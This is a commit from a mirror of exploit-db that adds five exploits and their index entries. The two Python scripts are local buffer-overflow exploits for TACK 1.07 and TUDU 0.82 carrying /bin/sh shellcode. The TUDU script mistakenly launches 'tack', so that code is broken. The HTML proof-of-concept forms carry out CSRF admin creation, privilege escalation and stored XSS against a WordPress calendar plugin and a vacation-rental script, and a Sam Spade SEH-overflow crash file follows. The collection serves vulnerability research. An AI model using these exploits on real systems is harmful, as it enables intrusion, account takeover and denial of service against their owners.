bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-11-13

Browse source 
5 new exploits
This commit is contained in:
Offensive Security 2015-11-13 05:03:26 +00:00
parent 26f0706a86
commit 4ab205abc3
6 changed files with 370 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -34921,6 +34921,7 @@ id,file,description,date,author,platform,type,port
38641,platforms/multiple/webapps/38641.rb,"JSSE SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0
38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0
38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple XSS Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0
38648,platforms/php/webapps/38648.txt,"WordPress My Calendar Plugin 2.4.10 - Multiple Vulnerabilities",2015-11-06,Mysticism,php,webapps,0
38649,platforms/php/webapps/38649.txt,"Google AdWords API PHP client library <= 6.2.0 - Arbitrary PHP Code Execution",2015-11-07,"Dawid Golunski",php,webapps,0
38650,platforms/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash PoC",2015-11-07,"Luis Martínez",windows,dos,0
38651,platforms/php/webapps/38651.txt,"eBay Magento CE <= 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / DoS)",2015-11-07,"Dawid Golunski",php,webapps,0
@ -34941,6 +34942,7 @@ id,file,description,date,author,platform,type,port
38667,platforms/windows/remote/38667.py,"ReadyMedia Remote Heap Buffer Overflow Vulnerability",2013-07-15,"Zachary Cutlip",windows,remote,0
38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption Information Disclosure Vulnerability",2013-07-09,"Brad Antoniewicz",windows,local,0
38669,platforms/multiple/remote/38669.txt,"MongoDB 'conn' Mongo Object Remote Code Execution Vulnerability",2013-06-04,"SCRT Security",multiple,remote,0
38684,platforms/php/webapps/38684.txt,"R-Scripts Vacation Rental Script 7R - Multiple Vulnerabilities",2015-11-12,LiquidWorm,php,webapps,0
38671,platforms/hardware/remote/38671.txt,"Barracuda CudaTel Multiple Cross-Site Scripting Vulnerabilities",2013-07-17,"Benjamin Kunz Mejri",hardware,remote,0
38672,platforms/windows/local/38672.txt,"YardRadius Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0
38673,platforms/php/webapps/38673.txt,"Collabtive Multiple Security Vulnerabilities",2013-07-22,"Enrico Cinquini",php,webapps,0
@ -34954,3 +34956,6 @@ id,file,description,date,author,platform,type,port
38681,platforms/linux/local/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,local,0
38682,platforms/php/webapps/38682.txt,"Jahia xCM /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0
38683,platforms/php/webapps/38683.txt,"Jahia xCM /administration/ Multiple Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0
38685,platforms/linux/local/38685.py,"TACK 1.07 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0
38686,platforms/linux/local/38686.py,"TUDU 0.82 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0
38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0

Can't render this file because it is too large.

48
platforms/linux/local/38685.py Executable file
View file

@ -0,0 +1,48 @@
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
# Program: tack - Terminal action checker
# Tested on: GNU/Linux - Kali Linux 2.0 x86
#
# Description: TACK v1.07 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: *http://www.z <http://www.rastersoft.com/>nyx.com <http://nyx.com>*
# Kali Linux 2.0 package: pool/main/t/tack/tack_1.07-1_amd64.deb
# MD5: 0fc1d2e9c374c1156b2b02186a9f8980
import os,subprocess
def run():
try:
print "# TACK v1.07 Stack-Based Overflow by Juan Sacco"
print "# It's Fuzzing time on unusable exploits"
print "# This exploit is for educational purposes only"
# Basic structure: JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*10
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*3022
eip = "\x30\xd1\xff\xbf"
subprocess.call(["tack",' ', junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "TACK not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Sorry, something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit TACK 1.07 Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()

48
platforms/linux/local/38686.py Executable file
View file

@ -0,0 +1,48 @@
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
# Program: tudu - Command line hierarchical ToDo list
# Tested on: GNU/Linux - Kali Linux 2.0 x86
#
# Description: TUDU v0.82 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.cauterized.net/~meskio/tudu
# Kali Linux 2.0 package: pool/main/t/tudu/tudu_0.8.2-1.deb
# MD5: 1dc2s2e9c374c9876b2b02283a9f5243
import os,subprocess
def run():
try:
print "# TUDU v0.82 Stack-Based Overflow by Juan Sacco"
print "# It's Fuzzing time on unusable exploits"
print "# This exploit is for educational purposes only"
# Basic structure: JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*10
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*124
eip = "\x60\xd3\xff\xbf"
subprocess.call(["tack",' ', junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "TUDU not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Sorry, something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit TUDU 0.82 Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()

48
platforms/php/webapps/38648.txt Executable file
View file

@ -0,0 +1,48 @@
Exploit TItle: My Calendar 2.4.10 CSRF and XSS
Exploit Author : Mysticism (Ahn Sung Jun)
Date : 2015-11-06
Vendor Homepage : http://wordpress.org/plugins/my-calendar
Software Link : https://downloads.wordpress.org/plugin/my-calendar.2.4.10.zip
Version : 2.4.10
Tested On : kail linux Iceweasel
===================
Vulnerable Code : my-calendar-categoris.php
if ( isset( $_POST['mode'] ) && $_POST['mode'] == 'add' ) {
$term = wp_insert_term( $_POST['category_name'], 'mc-event-category' );
if ( ! is_wp_error( $term ) ) {
$term = $term['term_id'];
} else {
$term = false;
}
$add = array(
'category_name' => $_POST['category_name'],
'category_color' => $_POST['category_color'],
'category_icon' => $_POST['category_icon'],
'category_private' => ( ( isset( $_POST['category_private'] ) ) ? 1 : 0 ),
'category_term' => $term
);
}
POC (CSRF & XSS)
<html>
<body onload="javascript:document.forms[0].submit()">
<form id="my-calendar" method="post" action="http://192.168.0.2/wordpress/wp-admin/admin.php?page=my-calendar-categories">
<input type="hidden" name="_wpnonce" value="35ed9ab206"/>
<input type="hidden" name="mode" value="add"/>
<input type="hidden" name="category_id" value="4"/>
<input name="category_name" id="cat_name" type="hidden" class="input" size="30" value="<script>alert(document.cookie)</script>">
<input type="hidden" id="cat_color" name="category_color" class="mc-color-input" size="10" maxlength="7" value=""/>
<input type="hidden" value="on" name="category_private" id="cat_private" />
<input type="hidden" value="on" name="mc_default_category" id="mc_default_category" />
<input type="hidden" value="on" name="mc_skip_holidays_category" id="mc_shc" />
<input type="submit" name="save" class="button-primary" value="Add Category &raquo;"/>
</form>
</html>
Discovered By
Mysticism(Ahn Sung Jun)

189
platforms/php/webapps/38684.txt Executable file
View file

@ -0,0 +1,189 @@

R-Scripts VRS 7R Multiple Stored XSS And CSRF Vulnerabilities
Vendor: R-Scripts
Product web page: http://www.r-scripts.com
Affected version: 7R
Summary: PHP Vacation Rental Script is the best solution
for your vacation rentals online business.
Desc: The application allows users to perform certain actions
via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform
certain actions with administrative privileges if a logged-in
user visits a malicious web site. Stored cross-site scripting
vulnerabilitity was also discovered. The issue is triggered
when input passed via multiple POST parameters is not properly
sanitized before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.
Tested on: Apache/2.2.29
PHP/5.3.29
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5274
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5274.php
01.10.2015
--
CSRF Add Admin:
---------------
<html>
<body>
<form action="http://127.0.0.1/admin/users/add" method="POST" enctype="multipart/form-data">
<input type="hidden" name="role" value="admin" />
<input type="hidden" name="username" value="Testingus" />
<input type="hidden" name="password" value="123123" />
<input type="hidden" name="retype&#95;password" value="123123" />
<input type="hidden" name="generate&#95;password&#95;label" value="&#32;Generate&#32;password" />
<input type="hidden" name="name" value="Test" />
<input type="hidden" name="email" value="test&#64;test&#46;tld" />
<input type="hidden" name="phone" value="111111111" />
<input type="hidden" name="phone2" value="&#13;" />
<input type="hidden" name="sms&#95;phone" value="&#13;" />
<input type="hidden" name="sms&#95;active" value="0" />
<input type="hidden" name="fax" value="&#13;" />
<input type="hidden" name="country" value="Uganda" />
<input type="hidden" name="location" value="N" />
<input type="hidden" name="address" value="Address" />
<input type="hidden" name="zip" value="&#13;" />
<input type="hidden" name="active&#95;newsletter" value="0" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="banned" value="0" />
<input type="hidden" name="ban&#95;reason" value="&#13;" />
<input type="hidden" name="verified&#95;user" value="1" />
<input type="hidden" name="paypal&#95;email" value="&#13;" />
<input type="hidden" name="submitf" value="submit" />
<input type="submit" value="CSRF Add Admin" />
</form>
</body>
</html>
Privilege Escalation:
---------------------
<html>
<body>
<form action="http://127.0.0.1/admin/users/edit/4" method="POST" enctype="multipart/form-data">
<input type="hidden" name="role" value="admin" />
<input type="hidden" name="username" value="member" />
<input type="hidden" name="password" value="&#13;" />
<input type="hidden" name="retype&#95;password" value="&#13;" />
<input type="hidden" name="generate&#95;password&#95;label" value="&#32;Generate&#32;password" />
<input type="hidden" name="name" value="Member" />
<input type="hidden" name="email" value="vrs&#95;owner&#64;vacationrentalscript&#46;com" />
<input type="hidden" name="phone" value="&#13;" />
<input type="hidden" name="phone2" value="&#13;" />
<input type="hidden" name="sms&#95;phone" value="&#13;" />
<input type="hidden" name="sms&#95;active" value="0" />
<input type="hidden" name="fax" value="&#13;" />
<input type="hidden" name="country" value="Germany" />
<input type="hidden" name="location" value="test" />
<input type="hidden" name="address" value="test&#32;address" />
<input type="hidden" name="zip" value="&#13;" />
<input type="hidden" name="active&#95;newsletter" value="1" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="banned" value="0" />
<input type="hidden" name="ban&#95;reason" value="&#13;" />
<input type="hidden" name="verified&#95;user" value="1" />
<input type="hidden" name="paypal&#95;email" value="sandbox&#95;owner2&#64;vacationrentalscript&#46;com" />
<input type="hidden" name="submitf" value="submit&#95;view" />
<input type="submit" value="Escalate" />
</form>
</body>
</html>
Stored XSS:
-----------
<html>
<body>
<form action="http://127.0.0.1/admin/mail_templates/add" method="POST">
<input type="hidden" name="alias" value='" onmousemove=confirm(1) >' />
<input type="hidden" name="sender&#95;name" value='" onmousemove=confirm(2) >' />
<input type="hidden" name="sender&#95;email" value='" onmousemove=confirm(3) >' />
<input type="hidden" name="bcc&#95;copy" value='" onmousemove=confirm(4) >' />
<input type="hidden" name="subject&#95;1" value='" onmousemove=confirm(5) >' />
<input type="hidden" name="subject&#95;2" value="&#13;" />
<input type="hidden" name="subject&#95;3" value="&#13;" />
<input type="hidden" name="subject&#95;4" value="&#13;" />
<input type="hidden" name="subject&#95;5" value="&#13;" />
<input type="hidden" name="body&#95;1" value="test" />
<input type="hidden" name="body&#95;2" value="&#13;" />
<input type="hidden" name="body&#95;3" value="&#13;" />
<input type="hidden" name="body&#95;4" value="&#13;" />
<input type="hidden" name="body&#95;5" value="&#13;" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="is&#95;bulk&#95;mail" value="0" />
<input type="hidden" name="submitf" value="submit&#95;view" />
<input type="submit" value="XSS Add Mail" />
</form>
</body>
</html>
Stored XSS:
-----------
<html>
<body>
<form action="http://127.0.0.1/admin/locations/add" method="POST">
<input type="hidden" name="location&#95;selected&#95;id" value="0" />
<input type="hidden" name="temp&#95;lat" value="0" />
<input type="hidden" name="temp&#95;lng" value="0" />
<input type="hidden" name="title&#95;1" value='" onmousemove=confirm(1) >' />
<input type="hidden" name="title&#95;2" value="&#13;" />
<input type="hidden" name="title&#95;3" value="&#13;" />
<input type="hidden" name="title&#95;4" value="&#13;" />
<input type="hidden" name="title&#95;5" value="&#13;" />
<input type="hidden" name="location&#95;parent&#95;id" value="&#45;1" />
<input type="hidden" name="slug&#95;1" value="&#13;" />
<input type="hidden" name="slug&#95;2" value="&#13;" />
<input type="hidden" name="slug&#95;3" value="&#13;" />
<input type="hidden" name="slug&#95;4" value="&#13;" />
<input type="hidden" name="slug&#95;5" value="&#13;" />
<input type="hidden" name="lat" value='" onmousemove=confirm(2) >' />
<input type="hidden" name="lng" value='" onmousemove=confirm(3) >' />
<input type="hidden" name="zip&#95;code" value="&#13;" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="submitf" value="submit" />
<input type="submit" value="XSS Add Location" />
</form>
</body>
</html>
Stored XSS:
-----------
<html>
<body>
<form action="http://127.0.0.1/admin/coupons/add" method="POST">
<input type="hidden" name="start&#95;date" value="&#13;" />
<input type="hidden" name="start&#95;date&#95;picker" value="&#13;" />
<input type="hidden" name="end&#95;date" value="2015&#45;11&#45;12" />
<input type="hidden" name="end&#95;date&#95;picker" value='" onmousemove=confirm(1) >' />
<input type="hidden" name="title" value='" onmousemove=confirm(2) >' />
<input type="hidden" name="hash" value="RG8AVL" />
<input type="hidden" name="coupon&#95;code" value='" onmousemove=confirm(3) >' />
<input type="hidden" name="discount" value='" onmousemove=confirm(4) >' />
<input type="hidden" name="utimes" value='" onmousemove=confirm(5) >' />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="submitf" value="submit&#95;view" />
<input type="submit" value="XSS Add Coupons" />
</form>
</body>
</html>

32
platforms/windows/dos/38687.py Executable file
View file

@ -0,0 +1,32 @@
#!/usr/bin/env python
# Exploit Title : Sam Spade 1.14 S-Lang Command Field SEH Overflow Crash PoC
# Discovery by : Nipun Jaswal
# Email : mail@nipunjaswal.info
# Discovery Date : 12/11/2015
# Vendor Homepage : http://samspade.org
# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version : 1.14
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS : Windows XP Professional SP2 x86 es
# Crash Point : Go to Tools > S-Lang Command> Enter the contents of 'sam_spade_slang_dos.txt' > OK , Note: Do Not Remove the round bracket
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# And the Stack
#00FBFE80 41414141 AAAA
#00FBFE84 41414141 AAAA
#00FBFE88 42424242 BBBB Pointer to next SEH record
#00FBFE8C 43434343 CCCC SE handler
# After the execution of POC, the SEH chain looks like this:
#Address SE handler
#00FBFE88 43434343
#42424242 *** CORRUPT ENTRY ***
f = open("sam_spade_slang_dos.txt", "w")
Junk_a = "A"*528
nseh= "B" * 4
seh= "C" *4
f.write(Junk_a+nseh+seh)
f.close()